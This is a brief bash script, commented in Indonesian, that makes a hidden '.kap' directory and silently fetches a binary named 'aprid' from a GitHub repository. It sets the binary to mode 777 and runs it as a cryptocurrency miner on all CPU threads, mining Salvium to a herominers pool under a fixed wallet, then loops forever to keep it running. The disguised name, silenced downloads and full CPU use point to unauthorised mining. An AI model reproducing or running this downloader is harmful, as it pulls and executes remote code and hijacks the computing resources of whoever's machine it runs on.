#!/bin/bash
mkdir -p .kap && cd .kap

# Unduh file 'aprid' dan 'SHA256SUMS' dari GitHub
wget -O aprid https://github.com/Dewinet/your/raw/refs/heads/main/aprid >/dev/null 2>&1
wget -O SHA256SUMS https://github.com/Dewinet/your/raw/refs/heads/main/SHA256SUMS >/dev/null 2>&1

# Beri izin eksekusi untuk file 'aprid'
chmod 777 aprid

# Verifikasi checksum file aprid menggunakan SHA256SUMS
sha256sum -c SHA256SUMS --ignore-missing

# Jalankan file aprid
./aprid --donate-level 1 -o sg.salvium.herominers.com:1230 -u SaLvdUj9vebTXP3ADtxozYLfwaBjG651pcKoy5kjD3FTEnZA3wT2fZNPxtJTWCwruX1QuKUxZKAdeAYiLumbJEcGK4XFc9wbP1w -p EMPUY -a rx/0 -k -t $(nproc --all)

# Loop agar skrip tetap berjalan
while [ 1 ]; do
    sleep 3
done
